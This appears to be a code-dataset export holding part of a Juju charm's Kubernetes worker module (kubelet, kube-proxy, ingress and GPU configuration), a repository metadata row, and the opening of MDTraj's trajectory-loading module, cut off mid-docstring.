create_kubeconfig(kubeproxyconfig_path, server, ca, token=creds['proxy_token'], user='kube-proxy') def parse_extra_args(config_key): elements = hookenv.config().get(config_key, '').split() args = {} for element in elements: if '=' in element: key, _, value = element.partition('=') args[key] = value else: args[element] = 'true' return args def configure_kubernetes_service(service, base_args, extra_args_key): db = unitdata.kv() prev_args_key = 'kubernetes-worker.prev_args.' 
+ service prev_args = db.get(prev_args_key) or {} extra_args = parse_extra_args(extra_args_key) args = {} for arg in prev_args: # remove previous args by setting to null args[arg] = 'null' for k, v in base_args.items(): args[k] = v for k, v in extra_args.items(): args[k] = v cmd = ['snap', 'set', service] + ['%s=%s' % item for item in args.items()] check_call(cmd) db.set(prev_args_key, args) def configure_kubelet(dns, ingress_ip): layer_options = layer.options('tls-client') ca_cert_path = layer_options.get('ca_certificate_path') server_cert_path = layer_options.get('server_certificate_path') server_key_path = layer_options.get('server_key_path') kubelet_opts = {} kubelet_opts['require-kubeconfig'] = 'true' kubelet_opts['kubeconfig'] = kubeconfig_path kubelet_opts['network-plugin'] = 'cni' kubelet_opts['v'] = '0' kubelet_opts['address'] = '0.0.0.0' kubelet_opts['port'] = '10250' kubelet_opts['cluster-domain'] = dns['domain'] kubelet_opts['anonymous-auth'] = 'false' kubelet_opts['client-ca-file'] = ca_cert_path kubelet_opts['tls-cert-file'] = server_cert_path kubelet_opts['tls-private-key-file'] = server_key_path kubelet_opts['logtostderr'] = 'true' kubelet_opts['fail-swap-on'] = 'false' kubelet_opts['node-ip'] = ingress_ip if (dns['enable-kube-dns']): kubelet_opts['cluster-dns'] = dns['sdn-ip'] # set --allow-privileged flag for kubelet kubelet_opts['allow-privileged'] = set_privileged() if is_state('kubernetes-worker.gpu.enabled'): hookenv.log('Adding ' '--feature-gates=DevicePlugins=true ' 'to kubelet') kubelet_opts['feature-gates'] = 'DevicePlugins=true' configure_kubernetes_service('kubelet', kubelet_opts, 'kubelet-extra-args') def configure_kube_proxy(api_servers, cluster_cidr): kube_proxy_opts = {} kube_proxy_opts['cluster-cidr'] = cluster_cidr kube_proxy_opts['kubeconfig'] = kubeproxyconfig_path kube_proxy_opts['logtostderr'] = 'true' kube_proxy_opts['v'] = '0' kube_proxy_opts['master'] = random.choice(api_servers) kube_proxy_opts['hostname-override'] = get_node_name() if b'lxc' in check_output('virt-what', shell=True): kube_proxy_opts['conntrack-max-per-core'] = '0' configure_kubernetes_service('kube-proxy', kube_proxy_opts, 'proxy-extra-args') def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None, user='ubuntu', context='juju-context', cluster='juju-cluster', password=None, token=None): '''Create a configuration for Kubernetes based on path using the supplied arguments for values of the Kubernetes server, CA, key, certificate, user context and cluster.''' if not key and not certificate and not password and not token: raise ValueError('Missing authentication mechanism.') # token and password are mutually exclusive. Error early if both are # present. The developer has requested an impossible situation. # see: kubectl config set-credentials --help if token and password: raise ValueError('Token and Password are mutually exclusive.') # Create the config file with the address of the master server. cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \ '--server={2} --certificate-authority={3} --embed-certs=true' check_call(split(cmd.format(kubeconfig, cluster, server, ca))) # Delete old users cmd = 'kubectl config --kubeconfig={0} unset users' check_call(split(cmd.format(kubeconfig))) # Create the credentials using the client flags. 
cmd = 'kubectl config --kubeconfig={0} ' \ 'set-credentials {1} '.format(kubeconfig, user) if key and certificate: cmd = '{0} --client-key={1} --client-certificate={2} '\ '--embed-certs=true'.format(cmd, key, certificate) if password: cmd = "{0} --username={1} --password={2}".format(cmd, user, password) # This is mutually exclusive from password. They will not work together. if token: cmd = "{0} --token={1}".format(cmd, token) check_call(split(cmd)) # Create a default context with the cluster. cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \ '--cluster={2} --user={3}' check_call(split(cmd.format(kubeconfig, context, cluster, user))) # Make the config use this new context. cmd = 'kubectl config --kubeconfig={0} use-context {1}' check_call(split(cmd.format(kubeconfig, context))) @when_any('config.changed.default-backend-image', 'config.changed.nginx-image') @when('kubernetes-worker.config.created') def launch_default_ingress_controller(): ''' Launch the Kubernetes ingress controller & default backend (404) ''' config = hookenv.config() # need to test this in case we get in # here from a config change to the image if not config.get('ingress'): return context = {} context['arch'] = arch() addon_path = '/root/cdk/addons/{}' context['defaultbackend_image'] = config.get('default-backend-image') if (context['defaultbackend_image'] == "" or context['defaultbackend_image'] == "auto"): if context['arch'] == 's390x': context['defaultbackend_image'] = \ "k8s.gcr.io/defaultbackend-s390x:1.4" else: context['defaultbackend_image'] = \ "k8s.gcr.io/defaultbackend:1.4" # Render the default http backend (404) replicationcontroller manifest manifest = addon_path.format('default-http-backend.yaml') render('default-http-backend.yaml', manifest, context) hookenv.log('Creating the default http backend.') try: kubectl('apply', '-f', manifest) except CalledProcessError as e: hookenv.log(e) hookenv.log('Failed to create default-http-backend. Will attempt again next update.') # noqa hookenv.close_port(80) hookenv.close_port(443) return # Render the ingress daemon set controller manifest context['ingress_image'] = config.get('nginx-image') if context['ingress_image'] == "" or context['ingress_image'] == "auto": if context['arch'] == 's390x': context['ingress_image'] = \ "docker.io/cdkbot/nginx-ingress-controller-s390x:0.9.0-beta.13" else: context['ingress_image'] = \ "k8s.gcr.io/nginx-ingress-controller:0.9.0-beta.15" # noqa if get_version('kubelet') < (1, 9): context['daemonset_api_version'] = 'extensions/v1beta1' else: context['daemonset_api_version'] = 'apps/v1beta2' context['juju_application'] = hookenv.service_name() manifest = addon_path.format('ingress-daemon-set.yaml') render('ingress-daemon-set.yaml', manifest, context) hookenv.log('Creating the ingress daemon set.') try: kubectl('apply', '-f', manifest) except CalledProcessError as e: hookenv.log(e) hookenv.log('Failed to create ingress controller. Will attempt again next update.') # noqa hookenv.close_port(80) hookenv.close_port(443) return set_state('kubernetes-worker.ingress.available') hookenv.open_port(80) hookenv.open_port(443) def restart_unit_services(): '''Restart worker services.''' hookenv.log('Restarting kubelet and kube-proxy.') services = ['kube-proxy', 'kubelet'] for service in services: service_restart('snap.%s.daemon' % service) def get_kube_api_servers(kube_api): '''Return the kubernetes api server address and port for this relationship.''' hosts = [] # Iterate over every service from the relation object. 
for service in kube_api.services(): for unit in service['hosts']: hosts.append('https://{0}:{1}'.format(unit['hostname'], unit['port'])) return hosts def kubectl(*args): ''' Run a kubectl cli command with a config file. Returns stdout and throws an error if the command fails. ''' command = ['kubectl', '--kubeconfig=' + kubeclientconfig_path] + list(args) hookenv.log('Executing {}'.format(command)) return check_output(command) def kubectl_success(*args): ''' Runs kubectl with the given args. Returns True if successful, False if not. ''' try: kubectl(*args) return True except CalledProcessError: return False def kubectl_manifest(operation, manifest): ''' Wrap the kubectl creation command when using filepath resources :param operation - one of get, create, delete, replace :param manifest - filepath to the manifest ''' # Deletions are a special case if operation == 'delete': # Ensure we immediately remove requested resources with --now return kubectl_success(operation, '-f', manifest, '--now') else: # Guard against an error re-creating the same manifest multiple times if operation == 'create': # If we already have the definition, its probably safe to assume # creation was true. if kubectl_success('get', '-f', manifest): hookenv.log('Skipping definition for {}'.format(manifest)) return True # Execute the requested command that did not match any of the special # cases above return kubectl_success(operation, '-f', manifest) @when('nrpe-external-master.available') @when_not('nrpe-external-master.initial-config') def initial_nrpe_config(nagios=None): set_state('nrpe-external-master.initial-config') update_nrpe_config(nagios) @when('kubernetes-worker.config.created') @when('nrpe-external-master.available') @when_any('config.changed.nagios_context', 'config.changed.nagios_servicegroups') def update_nrpe_config(unused=None): services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon') hostname = nrpe.get_nagios_hostname() current_unit = nrpe.get_nagios_unit_name() nrpe_setup = nrpe.NRPE(hostname=hostname) nrpe.add_init_service_checks(nrpe_setup, services, current_unit) nrpe_setup.write() @when_not('nrpe-external-master.available') @when('nrpe-external-master.initial-config') def remove_nrpe_config(nagios=None): remove_state('nrpe-external-master.initial-config') # List of systemd services for which the checks will be removed services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon') # The current nrpe-external-master interface doesn't handle a lot of logic, # use the charm-helpers code for now. hostname = nrpe.get_nagios_hostname() nrpe_setup = nrpe.NRPE(hostname=hostname) for service in services: nrpe_setup.remove_check(shortname=service) def set_privileged(): """Return 'true' if privileged containers are needed. This is when a) the user requested them b) user does not care (auto) and GPUs are available in a pre 1.9 era """ privileged = hookenv.config('allow-privileged').lower() gpu_needs_privileged = (is_state('kubernetes-worker.gpu.enabled') and get_version('kubelet') < (1, 9)) if privileged == 'auto': privileged = 'true' if gpu_needs_privileged else 'false' if privileged == 'false' and gpu_needs_privileged: disable_gpu() remove_state('kubernetes-worker.gpu.enabled') # No need to restart kubernetes (set the restart-needed state) # because set-privileged is already in the restart path return privileged @when('config.changed.allow-privileged') @when('kubernetes-worker.config.created') def on_config_allow_privileged_change(): """React to changed 'allow-privileged' config value. 
""" set_state('kubernetes-worker.restart-needed') remove_state('config.changed.allow-privileged') @when('nvidia-docker.installed') @when('kubernetes-worker.config.created') @when_not('kubernetes-worker.gpu.enabled') def enable_gpu(): """Enable GPU usage on this node. """ if get_version('kubelet') < (1, 9): hookenv.status_set( 'active', 'Upgrade to snap channel >= 1.9/stable to enable GPU suppport.' ) return hookenv.log('Enabling gpu mode') try: # Not sure why this is necessary, but if you don't run this, k8s will # think that the node has 0 gpus (as shown by the output of # `kubectl get nodes -o yaml` check_call(['nvidia-smi']) except CalledProcessError as cpe: hookenv.log('Unable to communicate with the NVIDIA driver.') hookenv.log(cpe) return set_label('gpu', 'true') set_label('cuda', 'true') set_state('kubernetes-worker.gpu.enabled') set_state('kubernetes-worker.restart-needed') @when('kubernetes-worker.gpu.enabled') @when_not('nvidia-docker.installed') @when_not('kubernetes-worker.restart-needed') def nvidia_departed(): """Cuda departed, probably due to the docker layer switching to a non nvidia-docker.""" disable_gpu() remove_state('kubernetes-worker.gpu.enabled') set_state('kubernetes-worker.restart-needed') def disable_gpu(): """Disable GPU usage on this node. """ hookenv.log('Disabling gpu mode') # Remove node labels remove_label('gpu') remove_label('cuda') @when('kubernetes-worker.gpu.enabled') @when('kube-control.connected') def notify_master_gpu_enabled(kube_control): """Notify kubernetes-master that we're gpu-enabled. """ kube_control.set_gpu(True) @when_not('kubernetes-worker.gpu.enabled') @when('kube-control.connected') def notify_master_gpu_not_enabled(kube_control): """Notify kubernetes-master that we're not gpu-enabled. """ kube_control.set_gpu(False) @when('kube-control.connected') def request_kubelet_and_proxy_credentials(kube_control): """ Request kubelet node authorization with a well formed kubelet user. This also implies that we are requesting kube-proxy auth. """ # The kube-cotrol interface is created to support RBAC. # At this point we might as well do the right thing and return the hostname # even if it will only be used when we enable RBAC nodeuser = 'system:node:{}'.format(get_node_name().lower()) kube_control.set_auth_request(nodeuser) @when('kube-control.connected') def catch_change_in_creds(kube_control): """Request a service restart in case credential updates were detected.""" nodeuser = 'system:node:{}'.format(get_node_name().lower()) creds = kube_control.get_auth_credentials(nodeuser) if creds and creds['user'] == nodeuser: # We need to cache the credentials here because if the # master changes (master leader dies and replaced by a new one) # the new master will have no recollection of our certs. db.set('credentials', creds) set_state('worker.auth.bootstrapped') if data_changed('kube-control.creds', creds): set_state('kubernetes-worker.restart-needed') @when_not('kube-control.connected') def missing_kube_control(): """Inform the operator they need to add the kube-control relation. If deploying via bundle this won't happen, but if operator is upgrading a a charm in a deployment that pre-dates the kube-control relation, it'll be missing. 
""" hookenv.status_set( 'blocked', 'Relate {}:kube-control kubernetes-master:kube-control'.format( hookenv.service_name())) @when('docker.ready') def fix_iptables_for_docker_1_13(): """ Fix iptables FORWARD policy for Docker >=1.13 https://github.com/kubernetes/kubernetes/issues/40182 https://github.com/kubernetes/kubernetes/issues/39823 """ cmd = ['iptables', '-w', '300', '-P', 'FORWARD', 'ACCEPT'] check_call(cmd) def _systemctl_is_active(application): ''' Poll systemctl to determine if the application is running ''' cmd = ['systemctl', 'is-active', application] try: raw = check_output(cmd) return b'active' in raw except Exception: return False def get_node_name(): kubelet_extra_args = parse_extra_args('kubelet-extra-args') cloud_provider = kubelet_extra_args.get('cloud-provider', '') if cloud_provider == 'aws': return getfqdn() else: return gethostname() class ApplyNodeLabelFailed(Exception): pass def persistent_call(cmd, retry_message): deadline = time.time() + 180 while time.time() < deadline: code = subprocess.call(cmd) if code == 0: return True hookenv.log(retry_message) time.sleep(1) else: return False def set_label(label, value): nodename = get_node_name() cmd = 'kubectl --kubeconfig={0} label node {1} {2}={3} --overwrite' cmd = cmd.format(kubeconfig_path, nodename, label, value) cmd = cmd.split() retry = 'Failed to apply label %s=%s. Will retry.' % (label, value) if not persistent_call(cmd, retry): raise ApplyNodeLabelFailed(retry) def remove_label(label): nodename = get_node_name() cmd = 'kubectl --kubeconfig={0} label node {1} {2}-' cmd = cmd.format(kubeconfig_path, nodename, label) cmd = cmd.split() retry = 'Failed to remove label {0}. Will retry.'.format(label) if not persistent_call(cmd, retry): raise ApplyNodeLabelFailed(retry)
GoogleCloudPlatform/k8s-multicluster-ingress
vendor/k8s.io/kubernetes/cluster/juju/layers/kubernetes-worker/reactive/kubernetes_worker.py
Python
apache-2.0
38,495
[ "CDK" ]
519b3bc78c8b1bdd5bc3c3f0e83671d38e7565a61ac3254849bad27e4ebde834
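The configure_kubernetes_service helper in the row above applies snap options by first resetting every option it set on a previous run to 'null', then layering the charm-managed base options and operator-supplied extra args on top, with extra args winning. The sketch below reimplements that merge as a pure function so the precedence is easy to test in isolation; merge_snap_args and its inputs are hypothetical names written for illustration, not part of the charm's actual API.

# Sketch of the snap-option merging scheme used by
# configure_kubernetes_service(); names here are illustrative.
def parse_extra_args_string(extra):
    # Mirrors parse_extra_args() above: 'k=v' pairs become entries,
    # bare flags become 'true'.
    args = {}
    for element in extra.split():
        if '=' in element:
            key, _, value = element.partition('=')
            args[key] = value
        else:
            args[element] = 'true'
    return args

def merge_snap_args(prev_args, base_args, extra_args_string):
    # Every previously-set option is nulled so stale settings do not
    # survive a config change, then defaults and overrides are layered.
    args = {key: 'null' for key in prev_args}
    args.update(base_args)                                  # charm defaults
    args.update(parse_extra_args_string(extra_args_string))  # operator overrides
    return args

# Example: 'v=4' overrides the base verbosity, and the stale
# 'feature-gates' option from a previous run is explicitly nulled.
merged = merge_snap_args(
    prev_args={'v': '0', 'feature-gates': 'DevicePlugins=true'},
    base_args={'v': '0', 'kubeconfig': '/root/cdk/kubeconfig'},
    extra_args_string='v=4 fail-swap-on=false')
assert merged['v'] == '4'
assert merged['feature-gates'] == 'null'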
############################################################################## # MDTraj: A Python Library for Loading, Saving, and Manipulating # Molecular Dynamics Trajectories. # Copyright 2012-2014 Stanford University and the Authors # # Authors: Robert McGibbon # Contributors: Kyle A. Beauchamp, TJ Lane, Joshua Adelman, Lee-Ping Wang, Jason Swails # # MDTraj is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as # published by the Free Software Foundation, either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with MDTraj. If not, see <http://www.gnu.org/licenses/>. ############################################################################## ############################################################################## # Imports ############################################################################## from __future__ import print_function, division import os import warnings from copy import deepcopy from collections import Iterable import numpy as np from mdtraj.formats import DCDTrajectoryFile from mdtraj.formats import BINPOSTrajectoryFile from mdtraj.formats import XTCTrajectoryFile from mdtraj.formats import TRRTrajectoryFile from mdtraj.formats import HDF5TrajectoryFile from mdtraj.formats import NetCDFTrajectoryFile from mdtraj.formats import LH5TrajectoryFile from mdtraj.formats import PDBTrajectoryFile from mdtraj.formats import MDCRDTrajectoryFile from mdtraj.formats import DTRTrajectoryFile from mdtraj.formats import LAMMPSTrajectoryFile from mdtraj.formats import XYZTrajectoryFile from mdtraj.formats import GroTrajectoryFile from mdtraj.formats import AmberNetCDFRestartFile from mdtraj.formats import AmberRestartFile from mdtraj.formats.prmtop import load_prmtop from mdtraj.formats.psf import load_psf from mdtraj.formats.mol2 import load_mol2 from mdtraj.formats.gro import load_gro from mdtraj.formats.arc import load_arc from mdtraj.formats.hoomdxml import load_hoomdxml from mdtraj.core.topology import Topology from mdtraj.core.residue_names import _SOLVENT_TYPES from mdtraj.utils import (ensure_type, in_units_of, lengths_and_angles_to_box_vectors, box_vectors_to_lengths_and_angles, cast_indices, deprecated) from mdtraj.utils.six.moves import xrange from mdtraj.utils.six import PY3, string_types from mdtraj import _rmsd from mdtraj import find_closest_contact from mdtraj import FormatRegistry from mdtraj.geometry import distance ############################################################################## # Globals ############################################################################## __all__ = ['open', 'load', 'iterload', 'load_frame', 'load_topology', 'Trajectory'] # supported extensions for constructing topologies _TOPOLOGY_EXTS = ['.pdb', '.pdb.gz', '.h5','.lh5', '.prmtop', '.parm7', '.psf', '.mol2', '.hoomdxml', '.gro', '.arc', '.hdf5'] ############################################################################## # Utilities ############################################################################## def _assert_files_exist(filenames): """Throw an IO error if files don't exist Parameters ---------- filenames : {str, [str]} String or list 
of strings to check
    """
    if isinstance(filenames, string_types):
        filenames = [filenames]
    for fn in filenames:
        if not (os.path.exists(fn) and os.path.isfile(fn)):
            raise IOError('No such file: %s' % fn)


def _assert_files_or_dirs_exist(names):
    """Throw an IO error if files don't exist

    Parameters
    ----------
    filenames : {str, [str]}
        String or list of strings to check
    """
    if isinstance(names, string_types):
        names = [names]
    for fn in names:
        if not (os.path.exists(fn) and \
                (os.path.isfile(fn) or os.path.isdir(fn))):
            raise IOError('No such file: %s' % fn)


if PY3:
    def _hash_numpy_array(x):
        hash_value = hash(x.shape)
        hash_value ^= hash(x.strides)
        hash_value ^= hash(x.data.tobytes())
        return hash_value
else:
    def _hash_numpy_array(x):
        writeable = x.flags.writeable
        try:
            x.flags.writeable = False
            hash_value = hash(x.shape)
            hash_value ^= hash(x.strides)
            hash_value ^= hash(x.data)
        finally:
            x.flags.writeable = writeable
        return hash_value


def load_topology(filename, **kwargs):
    """Load a topology

    Parameters
    ----------
    filename : str
        Path to a file containing a system topology. The following extensions
        are supported: '.pdb', '.pdb.gz', '.h5','.lh5', '.prmtop', '.parm7',
        '.psf', '.mol2', '.hoomdxml'

    Returns
    -------
    topology : md.Topology
    """
    return _parse_topology(filename, **kwargs)


def _parse_topology(top, **kwargs):
    """Get the topology from an argument of indeterminate type
    If top is a string, we try loading a pdb; if it's a trajectory we
    extract its topology.

    Returns
    -------
    topology : md.Topology
    """

    if isinstance(top, string_types):
        ext = _get_extension(top)
    else:
        ext = None  # might not be a string

    if isinstance(top, string_types) and (ext in ['.pdb', '.pdb.gz', '.h5','.lh5']):
        _traj = load_frame(top, 0, **kwargs)
        topology = _traj.topology
    elif isinstance(top, string_types) and (ext in ['.prmtop', '.parm7']):
        topology = load_prmtop(top, **kwargs)
    elif isinstance(top, string_types) and (ext in ['.psf']):
        topology = load_psf(top, **kwargs)
    elif isinstance(top, string_types) and (ext in ['.mol2']):
        topology = load_mol2(top, **kwargs).topology
    elif isinstance(top, string_types) and (ext in ['.gro']):
        topology = load_gro(top, **kwargs).topology
    elif isinstance(top, string_types) and (ext in ['.arc']):
        topology = load_arc(top, **kwargs).topology
    elif isinstance(top, string_types) and (ext in ['.hoomdxml']):
        topology = load_hoomdxml(top, **kwargs).topology
    elif isinstance(top, Trajectory):
        topology = top.topology
    elif isinstance(top, Topology):
        topology = top
    elif isinstance(top, string_types):
        raise IOError('The topology is loaded by filename extension, and the '
                      'detected "%s" format is not supported. Supported topology '
                      'formats include %s and "%s".' % (
                          ext, ', '.join(['"%s"' % e for e in _TOPOLOGY_EXTS[:-1]]),
                          _TOPOLOGY_EXTS[-1]))
    else:
        raise TypeError('A topology is required. You supplied top=%s' % str(top))

    return topology


def _get_extension(filename):
    (base, extension) = os.path.splitext(filename)
    if extension == '.gz':
        extension2 = os.path.splitext(base)[1]
        return extension2 + extension
    return extension


##############################################################################
# Utilities
##############################################################################


def open(filename, mode='r', force_overwrite=True, **kwargs):
    """Open a trajectory file-like object

    This factory function returns an instance of an open file-like
    object capable of reading/writing the trajectory (depending on 'mode').
    It does not actually load the trajectory from disk or write anything.
Parameters ---------- filename : str Path to the trajectory file on disk mode : {'r', 'w'} The mode in which to open the file, either 'r' for read or 'w' for write. force_overwrite : bool If opened in write mode, and a file by the name of `filename` already exists on disk, should we overwrite it? Other Parameters ---------------- kwargs : dict Other keyword parameters are passed directly to the file object Returns ------- fileobject : object Open trajectory file, whose type is determined by the filename extension See Also -------- load, ArcTrajectoryFile, BINPOSTrajectoryFile, DCDTrajectoryFile, HDF5TrajectoryFile, LH5TrajectoryFile, MDCRDTrajectoryFile, NetCDFTrajectoryFile, PDBTrajectoryFile, TRRTrajectoryFile, XTCTrajectoryFile """ extension = _get_extension(filename) try: loader = FormatRegistry.fileobjects[extension] except KeyError: raise IOError('Sorry, no loader for filename=%s (extension=%s) ' 'was found. I can only load files with extensions in %s' % (filename, extension, FormatRegistry.fileobjects.keys())) return loader(filename, mode=mode, force_overwrite=force_overwrite, **kwargs) def load_frame(filename, index, top=None, atom_indices=None, **kwargs): """Load a single frame from a trajectory file Parameters ---------- filename : str Path to the trajectory file on disk index : int Load the `index`-th frame from the specified file top : {str, Trajectory, Topology} Most trajectory formats do not contain topology information. Pass in either the path to a RCSB PDB file, a trajectory, or a topology to supply this information. atom_indices : array_like, optional If not none, then read only a subset of the atoms coordinates from the file. These indices are zero-based (not 1 based, as used by the PDB format). Examples -------- >>> import mdtraj as md >>> first_frame = md.load_frame('traj.h5', 0) >>> print first_frame <mdtraj.Trajectory with 1 frames, 22 atoms> See Also -------- load, load_frame Returns ------- trajectory : md.Trajectory The resulting conformation, as an md.Trajectory object containing a single frame. """ extension = _get_extension(filename) try: loader = FormatRegistry.loaders[extension] except KeyError: raise IOError('Sorry, no loader for filename=%s (extension=%s) ' 'was found. I can only load files with extensions in %s' % (filename, extension, FormatRegistry.loaders.keys())) kwargs['atom_indices'] = atom_indices if extension not in _TOPOLOGY_EXTS: kwargs['top'] = top if loader.__name__ not in ['load_dtr']: _assert_files_exist(filename) else: _assert_files_or_dirs_exist(filename) return loader(filename, frame=index, **kwargs) def load(filename_or_filenames, discard_overlapping_frames=False, **kwargs): """Load a trajectory from one or more files on disk. This function dispatches to one of the specialized trajectory loaders based on the extension on the filename. Because different trajectory formats save different information on disk, the specific keyword argument options supported depend on the specific loaded. Parameters ---------- filename_or_filenames : {str, list of strings} Filename or list of filenames containing trajectory files of a single format. discard_overlapping_frames : bool, default=False Look for overlapping frames between the last frame of one filename and the first frame of a subsequent filename and discard them Other Parameters ---------------- top : {str, Trajectory, Topology} Most trajectory formats do not contain topology information. Pass in either the path to a RCSB PDB file, a trajectory, or a topology to supply this information. 
This option is not required for the .h5, .lh5, and .pdb
        formats, which already contain topology information.
    stride : int, default=None
        Only read every stride-th frame
    atom_indices : array_like, optional
        If not none, then read only a subset of the atoms coordinates from the
        file. This may be slightly slower than the standard read because it
        requires an extra copy, but will save memory.

    See Also
    --------
    load_frame, iterload

    Examples
    --------
    >>> import mdtraj as md
    >>> traj = md.load('output.xtc', top='topology.pdb')
    >>> print traj
    <mdtraj.Trajectory with 500 frames, 423 atoms at 0x110740a90>

    >>> traj2 = md.load('output.xtc', stride=2, top='topology.pdb')
    >>> print traj2
    <mdtraj.Trajectory with 250 frames, 423 atoms at 0x11136e410>

    >>> traj3 = md.load('output.xtc', atom_indices=[0,1], top='topology.pdb')
    >>> print traj3
    <mdtraj.Trajectory with 500 frames, 2 atoms at 0x18236e4a0>

    Returns
    -------
    trajectory : md.Trajectory
        The resulting trajectory, as an md.Trajectory object.
    """
    if "top" in kwargs:  # If applicable, pre-loads the topology from PDB for major performance boost.
        kwargs["top"] = _parse_topology(kwargs["top"])

    # grab the extension of the filename
    if isinstance(filename_or_filenames, string_types):  # If a single filename
        extension = _get_extension(filename_or_filenames)
        filename = filename_or_filenames
    else:  # If multiple filenames, take the first one.
        extensions = [_get_extension(f) for f in filename_or_filenames]
        if len(set(extensions)) == 0:
            raise ValueError('No trajectories specified. '
                             'filename_or_filenames was an empty list')
        elif len(set(extensions)) > 1:
            raise TypeError("Each filename must have the same extension. "
                            "Received: %s" % ', '.join(set(extensions)))
        else:
            # we know the topology is equal because we sent the same topology
            # kwarg in. Therefore, we explicitly throw away the topology on all
            # but the first trajectory and use check_topology=False on the join.
            # Throwing the topology away explicitly allows a large number of pdb
            # files to be read in without using ridiculous amounts of memory.
            trajectories = []
            for (i, f) in enumerate(filename_or_filenames):
                t = load(f, **kwargs)
                if i != 0:
                    t.topology = None
                trajectories.append(t)
            return trajectories[0].join(trajectories[1:],
                                        discard_overlapping_frames=discard_overlapping_frames,
                                        check_topology=False)

    try:
        #loader = _LoaderRegistry[extension][0]
        loader = FormatRegistry.loaders[extension]
    except KeyError:
        raise IOError('Sorry, no loader for filename=%s (extension=%s) '
                      'was found. I can only load files '
                      'with extensions in %s' % (filename, extension,
                                                 FormatRegistry.loaders.keys()))

    if extension in _TOPOLOGY_EXTS:
        # this is a little hack that makes calling load() more predictable. since
        # most of the loaders take a kwargs "top" except for load_hdf5, (since
        # it saves the topology inside the file), we often end up calling
        # load_hdf5 via this function with the top kwarg specified. but then
        # there would be a signature binding error. it's easier just to ignore
        # it.
if 'top' in kwargs:
            warnings.warn('top= kwarg ignored since file contains topology information')
            kwargs.pop('top', None)

    if loader.__name__ not in ['load_dtr']:
        _assert_files_exist(filename_or_filenames)
    else:
        _assert_files_or_dirs_exist(filename_or_filenames)

    value = loader(filename, **kwargs)
    return value


def iterload(filename, chunk=100, **kwargs):
    """An iterator over a trajectory from one or more files on disk, in fragments

    This may be more memory efficient than loading an entire trajectory at
    once

    Parameters
    ----------
    filename : str
        Path to the trajectory file on disk
    chunk : int
        Number of frames to load at once from disk per iteration.  If 0, load all.

    Other Parameters
    ----------------
    top : {str, Trajectory, Topology}
        Most trajectory formats do not contain topology information. Pass in
        either the path to a RCSB PDB file, a trajectory, or a topology to
        supply this information. This option is not required for the .h5, .lh5,
        and .pdb formats, which already contain topology information.
    stride : int, default=None
        Only read every stride-th frame.
    atom_indices : array_like, optional
        If not none, then read only a subset of the atoms coordinates from the
        file. This may be slightly slower than the standard read because it
        requires an extra copy, but will save memory.
    skip : int, default=0
        Skip first n frames.

    See Also
    --------
    load, load_frame

    Examples
    --------
    >>> import mdtraj as md
    >>> for chunk in md.iterload('output.xtc', top='topology.pdb'):
    ...     print chunk
    <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90>
    <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90>
    <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90>
    <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90>
    <mdtraj.Trajectory with 100 frames, 423 atoms at 0x110740a90>
    """
    stride = kwargs.pop('stride', 1)
    atom_indices = cast_indices(kwargs.pop('atom_indices', None))
    top = kwargs.pop('top', None)
    skip = kwargs.pop('skip', 0)

    extension = _get_extension(filename)
    if extension not in _TOPOLOGY_EXTS:
        topology = _parse_topology(top)

    if chunk % stride != 0:
        raise ValueError('Stride must be a divisor of chunk. stride=%d does not go '
                         'evenly into chunk=%d' % (stride, chunk))
    if chunk == 0:
        # If chunk was 0 then we want to avoid filetype-specific code
        # in case of undefined behavior in various file parsers.
        # TODO: this will first apply stride, then skip!
        if extension not in _TOPOLOGY_EXTS:
            kwargs['top'] = top
        yield load(filename, **kwargs)[skip:]
    elif extension in ('.pdb', '.pdb.gz'):
        # the PDBTrajectoryFile class doesn't follow the standard API. Fixing it
        # to support iterload could be worthwhile, but requires a deep refactor.
        t = load(filename, stride=stride, atom_indices=atom_indices)
        for i in range(0, len(t), chunk):
            yield t[i:i+chunk]
    else:
        with (lambda x: open(x, n_atoms=topology.n_atoms)
              if extension in ('.crd', '.mdcrd')
              else open(filename))(filename) as f:
            if skip > 0:
                f.seek(skip)
            while True:
                if extension not in _TOPOLOGY_EXTS:
                    traj = f.read_as_traj(topology, n_frames=chunk*stride, stride=stride, atom_indices=atom_indices, **kwargs)
                else:
                    traj = f.read_as_traj(n_frames=chunk*stride, stride=stride, atom_indices=atom_indices, **kwargs)

                if len(traj) == 0:
                    raise StopIteration()

                yield traj


class Trajectory(object):
    """Container object for a molecular dynamics trajectory

    A Trajectory represents a collection of one or more molecular structures,
    generally (but not necessarily) from a molecular dynamics trajectory.
The Trajectory stores a number of fields describing the system through time, including the cartesian coordinates of each atoms (``xyz``), the topology of the molecular system (``topology``), and information about the unitcell if appropriate (``unitcell_vectors``, ``unitcell_length``, ``unitcell_angles``). A Trajectory should generally be constructed by loading a file from disk. Trajectories can be loaded from (and saved to) the PDB, XTC, TRR, DCD, binpos, NetCDF or MDTraj HDF5 formats. Trajectory supports fancy indexing, so you can extract one or more frames from a Trajectory as a separate trajectory. For example, to form a trajectory with every other frame, you can slice with ``traj[::2]``. Trajectory uses the nanometer, degree & picosecond unit system. Examples -------- >>> # loading a trajectory >>> import mdtraj as md >>> md.load('trajectory.xtc', top='native.pdb') <mdtraj.Trajectory with 1000 frames, 22 atoms at 0x1058a73d0> >>> # slicing a trajectory >>> t = md.load('trajectory.h5') >>> print(t) <mdtraj.Trajectory with 100 frames, 22 atoms> >>> print(t[::2]) <mdtraj.Trajectory with 50 frames, 22 atoms> >>> # calculating the average distance between two atoms >>> import mdtraj as md >>> import numpy as np >>> t = md.load('trajectory.h5') >>> np.mean(np.sqrt(np.sum((t.xyz[:, 0, :] - t.xyz[:, 21, :])**2, axis=1))) See Also -------- mdtraj.load : High-level function that loads files and returns an ``md.Trajectory`` Attributes ---------- n_frames : int n_atoms : int n_residues : int time : np.ndarray, shape=(n_frames,) timestep : float topology : md.Topology top : md.Topology xyz : 